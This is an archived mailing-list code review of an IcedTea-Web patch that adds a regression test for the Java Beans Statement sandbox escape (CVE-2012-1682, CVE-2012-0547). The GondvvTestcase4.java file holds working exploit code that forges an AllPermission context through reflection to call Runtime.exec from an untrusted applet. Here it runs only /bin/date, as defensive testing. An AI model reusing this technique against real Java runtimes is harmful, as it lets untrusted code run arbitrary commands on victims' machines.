[rfc][icedtea-web] Reproducer of BeansStatement behaviour
Adam Domurad
adomurad at redhat.com
Fri Dec 14 12:58:47 PST 2012
On 12/13/2012 11:35 AM, Jiri Vanek wrote:
> Ok for head?
>
> J.
I'm assuming this is OK for the repo since this has been made public
before. To be exact though this is testing a property of the JRE.
> diff -r 855087771e7e
> tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploit.html
> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
> +++
> b/tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploit.html
> Mon Sep 03 16:04:41 2012 +0200
> @@ -0,0 +1,42 @@
> +<!--
> +
> +This file is part of IcedTea.
> +
> +IcedTea is free software; you can redistribute it and/or modify
> +it under the terms of the GNU General Public License as published by
> +the Free Software Foundation; either version 2, or (at your option)
> +any later version.
> +
> +IcedTea is distributed in the hope that it will be useful, but
> +WITHOUT ANY WARRANTY; without even the implied warranty of
> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
> +General Public License for more details.
> +
> +You should have received a copy of the GNU General Public License
> +along with IcedTea; see the file COPYING. If not, write to the
> +Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
> Boston, MA
> +02110-1301 USA.
> +
> +Linking this library statically or dynamically with other modules is
> +making a combined work based on this library. Thus, the terms and
> +conditions of the GNU General Public License cover the whole
> +combination.
> +
> +As a special exception, the copyright holders of this library give you
> +permission to link this library with independent modules to produce an
> +executable, regardless of the license terms of these independent
> +modules, and to copy and distribute the resulting executable under
> +terms of your choice, provided that you also meet, for each linked
> +independent module, the terms and conditions of the license of that
> +module. An independent module is a module which is not derived from
> +or based on this library. If you modify this library, you may extend
> +this exception to your version of the library, but you are not
> +obligated to do so. If you do not wish to do so, delete this
> +exception statement from your version.
> +
> + -->
> +<html><head></head><body bgcolor="blue">
> +<p><applet code="GondvvMinimal2.class"
> archive="BeansStatementExploit.jar" codebase="." width="100" height="20">
> +</applet></p>
> +</body>
> +</html>
> diff -r 855087771e7e
> tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploitApplet.jnlp
Maybe 'BeansStatementBreakSandbox' would be a bit clearer.
> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
> +++
> b/tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploitApplet.jnlp
> Mon Sep 03 16:04:41 2012 +0200
> @@ -0,0 +1,61 @@
> +<!--
> +
> +This file is part of IcedTea.
> +
> +IcedTea is free software; you can redistribute it and/or modify
> +it under the terms of the GNU General Public License as published by
> +the Free Software Foundation; either version 2, or (at your option)
> +any later version.
> +
> +IcedTea is distributed in the hope that it will be useful, but
> +WITHOUT ANY WARRANTY; without even the implied warranty of
> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
> +General Public License for more details.
> +
> +You should have received a copy of the GNU General Public License
> +along with IcedTea; see the file COPYING. If not, write to the
> +Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
> Boston, MA
> +02110-1301 USA.
> +
> +Linking this library statically or dynamically with other modules is
> +making a combined work based on this library. Thus, the terms and
> +conditions of the GNU General Public License cover the whole
> +combination.
> +
> +As a special exception, the copyright holders of this library give you
> +permission to link this library with independent modules to produce an
> +executable, regardless of the license terms of these independent
> +modules, and to copy and distribute the resulting executable under
> +terms of your choice, provided that you also meet, for each linked
> +independent module, the terms and conditions of the license of that
> +module. An independent module is a module which is not derived from
> +or based on this library. If you modify this library, you may extend
> +this exception to your version of the library, but you are not
> +obligated to do so. If you do not wish to do so, delete this
> +exception statement from your version.
> +
> + -->
> +<?xml version="1.0" encoding="utf-8"?>
> +<jnlp spec="1.0" href="BeansStatementExploitApplet.jnlp" codebase=".">
> + <information>
> + <title>BeansStatementExploitApplet</title>
> + <vendor>IcedTea</vendor>
> + <homepage
> href="http://icedtea.classpath.org/wiki/IcedTea-Web#Testing_IcedTea-Web"/>
> + <description>BeansStatementExploitApplet</description>
> + <offline/>
> + </information>
> + <resources>
> + <j2se version="1.6+"/>
> + <jar href="BeansStatementExploit.jar"/>
> + </resources>
> + <applet-desc
> + documentBase="."
> + name="BeansStatementExploitApplet"
> + main-class="GondvvMinimal2"
> + width="100"
> + height="100">
> + </applet-desc>
> +</jnlp>
> +
> +
> +</applet-desc>
> diff -r 855087771e7e
> tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploitWS.jnlp
> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
> +++
> b/tests/reproducers/simple/BeansStatementExploit/resources/BeansStatementExploitWS.jnlp
> Mon Sep 03 16:04:41 2012 +0200
> @@ -0,0 +1,56 @@
> +<!--
> +
> +This file is part of IcedTea.
> +
> +IcedTea is free software; you can redistribute it and/or modify
> +it under the terms of the GNU General Public License as published by
> +the Free Software Foundation; either version 2, or (at your option)
> +any later version.
> +
> +IcedTea is distributed in the hope that it will be useful, but
> +WITHOUT ANY WARRANTY; without even the implied warranty of
> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
> +General Public License for more details.
> +
> +You should have received a copy of the GNU General Public License
> +along with IcedTea; see the file COPYING. If not, write to the
> +Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
> Boston, MA
> +02110-1301 USA.
> +
> +Linking this library statically or dynamically with other modules is
> +making a combined work based on this library. Thus, the terms and
> +conditions of the GNU General Public License cover the whole
> +combination.
> +
> +As a special exception, the copyright holders of this library give you
> +permission to link this library with independent modules to produce an
> +executable, regardless of the license terms of these independent
> +modules, and to copy and distribute the resulting executable under
> +terms of your choice, provided that you also meet, for each linked
> +independent module, the terms and conditions of the license of that
> +module. An independent module is a module which is not derived from
> +or based on this library. If you modify this library, you may extend
> +this exception to your version of the library, but you are not
> +obligated to do so. If you do not wish to do so, delete this
> +exception statement from your version.
> +
> + -->
> +<?xml version="1.0" encoding="utf-8"?>
> +<jnlp spec="1.0" href="BeansStatementExploitWS.jnlp" codebase=".">
> + <information>
> + <title>BeansStatementExploitWS</title>
> + <vendor>IcedTea</vendor>
> + <homepage
> href="http://icedtea.classpath.org/wiki/IcedTea-Web#Testing_IcedTea-Web"/>
> + <description>BeansStatementExploitWS</description>
> + <offline/>
> + </information>
> + <resources>
> + <j2se version="1.6+"/>
> + <jar href="BeansStatementExploit.jar"/>
> + </resources>
> + <application-desc main-class="GondvvTestcase4">
> + </application-desc>
> +</jnlp>
> +
> +
> +</applet-desc>
> diff -r 855087771e7e
> tests/reproducers/simple/BeansStatementExploit/srcs/GondvvMinimal2.java
> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
> +++
> b/tests/reproducers/simple/BeansStatementExploit/srcs/GondvvMinimal2.java
> Mon Sep 03 16:04:41 2012 +0200
> @@ -0,0 +1,49 @@
> +/* GondvvMinimal2.java
> +Copyright (C) 2011 Red Hat, Inc.
> +
> +This file is part of IcedTea.
> +
> +IcedTea is free software; you can redistribute it and/or
> +modify it under the terms of the GNU General Public License as
> published by
> +the Free Software Foundation, version 2.
> +
> +IcedTea is distributed in the hope that it will be useful,
> +but WITHOUT ANY WARRANTY; without even the implied warranty of
> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
> +General Public License for more details.
> +
> +You should have received a copy of the GNU General Public License
> +along with IcedTea; see the file COPYING. If not, write to
> +the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
> Boston, MA
> +02110-1301 USA.
> +
> +Linking this library statically or dynamically with other modules is
> +making a combined work based on this library. Thus, the terms and
> +conditions of the GNU General Public License cover the whole
> +combination.
> +
> +As a special exception, the copyright holders of this library give you
> +permission to link this library with independent modules to produce an
> +executable, regardless of the license terms of these independent
> +modules, and to copy and distribute the resulting executable under
> +terms of your choice, provided that you also meet, for each linked
> +independent module, the terms and conditions of the license of that
> +module. An independent module is a module which is not derived from
> +or based on this library. If you modify this library, you may extend
> +this exception to your version of the library, but you are not
> +obligated to do so. If you do not wish to do so, delete this
> +exception statement from your version.
> + */
> +
> +import java.applet.Applet;
> +
> +
> +public class GondvvMinimal2 extends Applet {
I understand why you chose this name, but I would prefer something more
descriptive of the intent of the applet.
> +
> + @Override
> + public void init() {
> + GondvvTestcase4.main(new String[0]);
> +
> + }
> +
> +}
> diff -r 855087771e7e
> tests/reproducers/simple/BeansStatementExploit/srcs/GondvvTestcase4.java
> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
> +++
> b/tests/reproducers/simple/BeansStatementExploit/srcs/GondvvTestcase4.java
> Mon Sep 03 16:04:41 2012 +0200
> @@ -0,0 +1,181 @@
> +/* GondvvTestcase4.java
> +Copyright (C) 2011 Red Hat, Inc.
> +
> +This file is part of IcedTea.
> +
> +IcedTea is free software; you can redistribute it and/or
> +modify it under the terms of the GNU General Public License as
> published by
> +the Free Software Foundation, version 2.
> +
> +IcedTea is distributed in the hope that it will be useful,
> +but WITHOUT ANY WARRANTY; without even the implied warranty of
> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
> +General Public License for more details.
> +
> +You should have received a copy of the GNU General Public License
> +along with IcedTea; see the file COPYING. If not, write to
> +the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
> Boston, MA
> +02110-1301 USA.
> +
> +Linking this library statically or dynamically with other modules is
> +making a combined work based on this library. Thus, the terms and
> +conditions of the GNU General Public License cover the whole
> +combination.
> +
> +As a special exception, the copyright holders of this library give you
> +permission to link this library with independent modules to produce an
> +executable, regardless of the license terms of these independent
> +modules, and to copy and distribute the resulting executable under
> +terms of your choice, provided that you also meet, for each linked
> +independent module, the terms and conditions of the license of that
> +module. An independent module is a module which is not derived from
> +or based on this library. If you modify this library, you may extend
> +this exception to your version of the library, but you are not
> +obligated to do so. If you do not wish to do so, delete this
> +exception statement from your version.
> + */
> +
> +import java.beans.Statement;
> +import java.beans.Expression;
> +
> +import java.lang.reflect.Field;
> +import java.net.URL;
> +import java.security.*;
> +import java.security.cert.Certificate;
> +import java.io.InputStreamReader;
> +import java.io.BufferedReader;
> +
> +/**
> + *
> + * Summary for @
> + * http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682
> + * and
> + * http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547
> + */
> +public class GondvvTestcase4 {
> +
> + public static int runproc(Process proc) throws Exception {
> + BufferedReader cmdout = new BufferedReader(new
> InputStreamReader(proc.getInputStream()));
> + String line;
> + while ((line = cmdout.readLine()) != null) {
> + System.out.println(line);
> + }
> + proc.waitFor();
> + return proc.exitValue();
> + }
> +
> + public static void runcommand_exploit(String cmd) throws Exception {
> + Expression exec_ex = new Expression(Runtime.getRuntime(),
> "exec", new String[]{cmd});
> +
> + Permissions perms = new Permissions();
> + perms.add(new AllPermission());
> + ProtectionDomain protdomain = new ProtectionDomain(
> + new CodeSource(new URL("file:///"), new
> Certificate[0]), perms);
> + AccessControlContext acc = new AccessControlContext(new
> ProtectionDomain[]{protdomain});
> +
> + Expression tmp_ex = new Expression(Class.class, "forName",
> new Object[]{"sun.awt.SunToolkit"});
> + tmp_ex.execute();
> + Class toolkit = (Class) tmp_ex.getValue();
> +
> + tmp_ex = new Expression(toolkit, "getField", new
> Object[]{Statement.class, "acc"});
> + tmp_ex.execute();
> + ((Field) tmp_ex.getValue()).set(exec_ex, acc);
> + exec_ex.execute();
> +
> + runproc((Process) exec_ex.getValue());
> + }
> +
> + public static void runcommand_direct(String cmd) throws Exception {
> + runproc(Runtime.getRuntime().exec(cmd));
> + }
> +
> + public static void main(String[] args) {
> + System.out.println("Running GondvvTest");
> + args = new String[]{"/bin/date"};
> + try {
> + System.out.println("Directly calling:
> Class.forName(\"sun.awt.SunToolkit\")");
> +
> + Object cl = Class.forName("sun.awt.SunToolkit");
> + System.out.println("FAIL: " + cl.toString());
> + } catch (AccessControlException e) {
> + System.out.println("OK: got expected: " + e.toString());
> + } catch (Exception e) {
> + System.out.println("FAIL: unexpected exception: " +
> e.toString());
> + e.printStackTrace();
> + }
Can you move the FAIL/OK checks into the testcase class possibly ? I
guess its OK as it is, but if you can make the testcase do more checking
and not just checking for FAIL it would be good.
> + System.out.println();
> +
> +
> + try {
> + System.out.println("Calling: Expression(Class.class,
> \"forName\", new String[]{\"sun.awt.SunToolkit\"})");
> +
> + Expression ex = new Expression(Class.class, "forName",
> new String[]{"sun.awt.SunToolkit"});
> + ex.execute();
> + Object cl = ex.getValue();
> + System.out.println("FAIL: " + cl.toString());
> + System.out.println();
> + System.out.println("Checking if SunToolkit class
> reference is usable");
> + try {
> + ex = new Expression(cl, "getField", new
> Object[]{Byte.class, "SIZE"});
> + ex.execute();
> + System.out.println("FAIL: " + ex.getValue().toString());
> + } catch (NoSuchMethodException e) {
> + System.out.println("INFO: " + e.toString());
> + e.printStackTrace();
> + } catch (Exception e) {
> + System.out.println("FAIL: unexpected exception: " +
> e.toString());
> + e.printStackTrace();
> + }
> +
> + try {
> + ex = new Expression(cl, "getField", new
> Object[]{Statement.class, "acc"});
> + ex.execute();
> + System.out.println("FAIL: " + ex.getValue().toString());
> + } catch (NoSuchMethodException e) {
> + System.out.println("INFO: " + e.toString());
> + e.printStackTrace();
> + } catch (Exception e) {
> + System.out.println("FAIL: unexpected exception: " +
> e.toString());
> + e.printStackTrace();
> + }
> + } catch (AccessControlException e) {
> + System.out.println("OK: got expected: " + e.toString());
> + } catch (Exception e) {
> + System.out.println("FAIL: unexpected exception: " +
> e.toString());
> + e.printStackTrace();
> + }
> + System.out.println();
> +
> + if (args.length == 0) {
> + }
??
> +
> + try {
> + System.out.println("Running command directly: " + args[0]);
> + runcommand_direct(args[0]);
> + System.out.println("FAIL: commnad was run");
> + } catch (AccessControlException e) {
> + System.out.println("OK: got expected: " + e.toString());
> + } catch (Exception e) {
> + System.out.println("FAIL: unexpected exception: " +
> e.toString());
> + e.printStackTrace();
> + }
> + System.out.println();
> +
> + try {
> + System.out.println("Running command using exploit: " +
> args[0]);
> + runcommand_exploit(args[0]);
> + System.out.println("FAIL: commnad was run");
> + } catch (AccessControlException e) {
> + System.out.println("OK: got expected: " + e.toString());
> + } catch (NoSuchMethodException e) {
> + System.out.println("FAIL: " + e.toString());
> + e.printStackTrace();
> + } catch (Exception e) {
> + System.out.println("FAIL: unexpected exception: " +
> e.toString());
> + e.printStackTrace();
> + }
> + System.out.println();
Looks OK but again
> +
> +
> + }
> +}
> diff -r 855087771e7e
> tests/reproducers/simple/BeansStatementExploit/testcases/BeansStatementExploitTests.java
> --- /dev/null Thu Jan 01 00:00:00 1970 +0000
> +++
> b/tests/reproducers/simple/BeansStatementExploit/testcases/BeansStatementExploitTests.java
> Mon Sep 03 16:04:41 2012 +0200
> @@ -0,0 +1,82 @@
> +/* BeansStatementExploitTests.java
> +Copyright (C) 2011 Red Hat, Inc.
> +
> +This file is part of IcedTea.
> +
> +IcedTea is free software; you can redistribute it and/or
> +modify it under the terms of the GNU General Public License as
> published by
> +the Free Software Foundation, version 2.
> +
> +IcedTea is distributed in the hope that it will be useful,
> +but WITHOUT ANY WARRANTY; without even the implied warranty of
> +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
> +General Public License for more details.
> +
> +You should have received a copy of the GNU General Public License
> +along with IcedTea; see the file COPYING. If not, write to
> +the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
> Boston, MA
> +02110-1301 USA.
> +
> +Linking this library statically or dynamically with other modules is
> +making a combined work based on this library. Thus, the terms and
> +conditions of the GNU General Public License cover the whole
> +combination.
> +
> +As a special exception, the copyright holders of this library give you
> +permission to link this library with independent modules to produce an
> +executable, regardless of the license terms of these independent
> +modules, and to copy and distribute the resulting executable under
> +terms of your choice, provided that you also meet, for each linked
> +independent module, the terms and conditions of the license of that
> +module. An independent module is a module which is not derived from
> +or based on this library. If you modify this library, you may extend
> +this exception to your version of the library, but you are not
> +obligated to do so. If you do not wish to do so, delete this
> +exception statement from your version.
> + */
> +
> +import net.sourceforge.jnlp.ProcessResult;
> +import net.sourceforge.jnlp.annotations.Bug;
> +import net.sourceforge.jnlp.browsertesting.BrowserTest;
> +import net.sourceforge.jnlp.browsertesting.Browsers;
> +import net.sourceforge.jnlp.annotations.NeedsDisplay;
> +import net.sourceforge.jnlp.annotations.TestInBrowsers;
> +import org.junit.Assert;
> +
> +import org.junit.Test;
> +
> +public class BeansStatementExploitTests extends BrowserTest {
> +
> + @Test
> + @NeedsDisplay
> +
> @Bug(id={"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682", "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547"})
> + public void BeansStatementExploitTestWS() throws Exception {
> + ProcessResult pr = server.executeJavawsHeadless(null,
> "/BeansStatementExploitWS.jnlp");
> + evaluate(pr);
> + }
> +
> + @Test
> + @NeedsDisplay
> +
> @Bug(id={"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682", "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547"})
> + public void BeansStatementExploitTesWsApplet() throws Exception {
> + ProcessResult pr = server.executeJavawsHeadless(null,
> "/BeansStatementExploitApplet.jnlp");
> + evaluate(pr);
> + }
> +
> + @Test
> + @TestInBrowsers(testIn = {Browsers.all})
> + @NeedsDisplay
> +
> @Bug(id={"http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1682", "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2012-0547"})
> + public void BeansStatementExploitTestApplet() throws Exception {
> + ProcessResult pr =
> server.executeBrowser("/BeansStatementExploit.html");
> + evaluate(pr);
> + Assert.assertTrue(pr.wasTerminated);
> + }
> +
> + private void evaluate(ProcessResult pr) {
> + Assert.assertTrue("Output of reproducerwas empty => it was
> not run", (pr.stdout.length() > 0));
> + Assert.assertTrue("Output of reproducerwas have not
> contained 'Running GondvvTest' => it was not run",
> (pr.stdout.contains("Running GondvvTest")));
> + Assert.assertFalse("Output of reproducer contained FAIL, that
> means that exploit have hacked your system",
> (pr.stdout.contains("FAIL:")));
> +
> + }
> +}
Looks OK, although this seems like something that is better placed in a
JRE's test suite, not ITWs. I have no problems with it going in the
repo, though.
Happy hacking,
-Adam
More information about the distro-pkg-dev
mailing list